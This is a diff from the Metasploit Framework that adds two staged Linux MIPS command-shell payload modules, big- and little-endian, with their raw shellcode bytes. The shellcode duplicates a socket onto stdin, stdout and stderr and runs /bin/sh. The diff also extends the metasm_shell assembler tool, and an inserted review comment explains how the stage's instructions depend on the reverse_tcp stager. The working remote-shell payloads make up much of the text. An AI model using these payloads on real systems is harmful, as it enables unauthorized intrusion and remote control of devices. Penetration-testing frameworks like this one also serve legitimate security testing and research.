"\x0c\x01\x01\x01\xf8\xff\xb1\x8f\xfc\xff\xb2\x8f\x09\xf8" +
|
||||
"\x20\x02"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,36 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
include Msf::Payload::Linux
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Linux Command Shell',
|
||||
'Description' => 'Spawn a command shell (staged)',
|
||||
'Author' => 'juan vazquez',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSBE,
|
||||
'Session' => Msf::Sessions::CommandShellUnix,
|
||||
'Stage' =>
|
||||
{
|
||||
'Payload' =>
|
||||
"\x24\x11\xff\xfd\x02\x20\x88\x27\x02\x40\x20\x20\x02\x20" +
|
||||
"\x28\x20\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x10\xff\xff" +
|
||||
"\x22\x31\xff\xff\x16\x11\xff\xfa\x24\x18\xff\xff\x07\x10" +
|
||||
"\xff\xff\x28\x18\xff\xff\x23\xe4\x00\x1c\xaf\xa4\xff\xf8" +
|
||||
"\xaf\xa0\xff\xfc\x23\xa5\xff\xf8\x28\x06\xff\xff\x24\x02" +
|
||||
"\x0f\xab\x01\x01\x01\x0c\x2f\x62\x69\x6e\x2f\x73\x68\x00"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
end
|
|
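Review bot: The stage bytes depend on a register contract this module never states: the opening `\x24\x11\xff\xfd\x02\x20\x88\x27\x02\x40\x20\x20` (`li s1,-3` / `nor s1,s1,zero` / `add a0,s2,zero`) takes the socket descriptor from $s2, which only holds it because the reverse_tcp stager ends with `lw $s2, -4($sp)` before `jalr`. A comment on 'Payload' such as `# expects the socket fd in $s2 (left there by the linux/mipsbe reverse_tcp stager); dup2s it onto 2,1,0 and execve("/bin/sh")` would make the dependency visible, and naming the assembly source (stage_tcp_shell.s in this commit) helps keep the bytes in sync. The same applies to the little-endian stage in the next file section.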
@ -0,0 +1,36 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
include Msf::Payload::Linux
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Linux Command Shell',
|
||||
'Description' => 'Spawn a command shell (staged)',
|
||||
'Author' => 'juan vazquez',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSLE,
|
||||
'Session' => Msf::Sessions::CommandShellUnix,
|
||||
'Stage' =>
|
||||
{
|
||||
'Payload' =>
|
||||
"\xfd\xff\x11\x24\x27\x88\x20\x02\x20\x20\x40\x02\x20\x28" +
|
||||
"\x20\x02\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\x10\x24" +
|
||||
"\xff\xff\x31\x22\xfa\xff\x11\x16\xff\xff\x18\x24\xff\xff" +
|
||||
"\x10\x07\xff\xff\x18\x28\x1c\x00\xe4\x23\xf8\xff\xa4\xaf" +
|
||||
"\xfc\xff\xa0\xaf\xf8\xff\xa5\x23\xff\xff\x06\x28\xab\x0f" +
|
||||
"\x02\x24\x0c\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68\x00"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
end
|
|
@ -3,7 +3,8 @@
|
|||
# $Id$
|
||||
#
|
||||
# This tool provides an easy way to see what opcodes are associated with
|
||||
# certain x86 instructions by making use of Metasm!
|
||||
# certain x86 instructions by making use of Metasm! Also allows to get
|
||||
# friendly output from a GAS assembler source code file.
|
||||
#
|
||||
#
|
||||
# $Revision$
|
||||
|
@ -32,6 +33,9 @@ require 'metasm'
|
|||
#PowerPC, seems broken for now in metasm
|
||||
#@Arch = ['Ia32','MIPS','PowerPC','ARM','X86_64']
|
||||
@Arch = ['Ia32','MIPS','ARM','X86_64']
|
||||
@Endian = ['little','big']
|
||||
@architecture = ""
|
||||
@endianess = ""
|
||||
|
||||
def usage
|
||||
$stderr.puts("\nUsage: #{$0} <options>\n" + $args.usage)
|
||||
|
@ -40,7 +44,8 @@ end
|
|||
|
||||
$args = Rex::Parser::Arguments.new(
|
||||
"-a" => [ true, "The architecture to encode as (#{@Arch.sort.collect{|a| a + ', ' }.join.gsub(/\, $/,'')})"],
|
||||
"-h" => [ false, "Display this help information" ])
|
||||
"-e" => [ true, "The endianess to encode as (#{@Endian.sort.collect{|a| a + ', ' }.join.gsub(/\, $/,'')})" ],
|
||||
"-h" => [ false, "Display this help information" ])
|
||||
|
||||
$args.parse(ARGV) { |opt, idx, val|
|
||||
case opt
|
||||
|
@ -48,12 +53,20 @@ $args.parse(ARGV) { |opt, idx, val|
|
|||
found = nil
|
||||
@Arch.each { |a|
|
||||
if val.downcase == a.downcase
|
||||
String.class_eval("@@cpu = Metasm::#{a}.new")
|
||||
@architecture = a
|
||||
found = true
|
||||
end
|
||||
}
|
||||
usage if not found
|
||||
when "-e"
|
||||
found = nil
|
||||
@Endian.each { |e|
|
||||
if val.downcase == e.downcase
|
||||
@endianess = e
|
||||
found = true
|
||||
end
|
||||
}
|
||||
usage if not found
|
||||
|
||||
when "-h"
|
||||
usage
|
||||
else
|
||||
|
@ -61,6 +74,14 @@ $args.parse(ARGV) { |opt, idx, val|
|
|||
end
|
||||
}
|
||||
|
||||
unless @architecture.empty?
|
||||
if @endianess.empty?
|
||||
String.class_eval("@@cpu = Metasm::#{@architecture}.new")
|
||||
else
|
||||
String.class_eval("@@cpu = Metasm::#{@architecture}.new(:#{@endianess})")
|
||||
end
|
||||
end
|
||||
|
||||
class String
|
||||
@@cpu ||= Metasm::Ia32.new
|
||||
class << self
|
||||
|
@ -98,23 +119,61 @@ class String
|
|||
def decode(base_addr=0, eip=base_addr)
|
||||
decode_blocks(base_addr, eip).to_s
|
||||
end
|
||||
|
||||
def disassemble(str, eip=0)
|
||||
Metasm::Shellcode.disassemble(@@cpu, str, eip)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def parse_gas_file(filename)
|
||||
unless ::File.exist?(filename)
|
||||
puts "File #(unknown) not found"
|
||||
return
|
||||
end
|
||||
shellcode = ""
|
||||
puts "Reading file #(unknown)"
|
||||
::File.open(filename, "rb") do |f|
|
||||
f.each_line do |l|
|
||||
l.gsub!(/#.*$/, "") # Delete comments
|
||||
l.gsub!(/@.*$/, "") # Delete comments
|
||||
l.gsub!(/\..*$/, "") # Delete directives
|
||||
l.gsub!(/(\r|\n)/, '') # Delete newlines... just in case...
|
||||
next if l.strip.empty?
|
||||
shellcode << "#{l}\n"
|
||||
end
|
||||
end
|
||||
|
||||
begin
|
||||
encoded = shellcode.encode
|
||||
puts Rex::Text.to_ruby(encoded)
|
||||
puts encoded.disassemble(shellcode.encode)
|
||||
rescue Metasm::Exception => e
|
||||
puts "Error: #{e.class} #{e.message}"
|
||||
end
|
||||
end
|
||||
|
||||
# Start a pseudo shell and dispatch lines to be assembled and then
|
||||
# disassembled.
|
||||
shell = Rex::Ui::Text::PseudoShell.new("%bldmetasm%clr")
|
||||
shell.init_ui(Rex::Ui::Text::Input::Stdio.new, Rex::Ui::Text::Output::Stdio.new)
|
||||
|
||||
puts 'type "exit" or "quit" to quit', 'use ";" or "\\n" for newline', ''
|
||||
puts [
|
||||
'type "exit" or "quit" to quit',
|
||||
'use ";" or "\\n" for newline',
|
||||
'type "file <file>" to parse a GAS assembler source file',
|
||||
'']
|
||||
|
||||
shell.run { |l|
|
||||
l.gsub!(/(\r|\n)/, '')
|
||||
l.gsub!(/\\n/, "\n")
|
||||
l.gsub!(/\\n/, "\n")
|
||||
l.gsub!(';', "\n")
|
||||
|
||||
break if %w[quit exit].include? l.chomp
|
||||
if l.chomp.index(/^file (.*)/)
|
||||
parse_gas_file($1)
|
||||
next
|
||||
end
|
||||
next if l.strip.empty?
|
||||
|
||||
begin
|
||||
|
|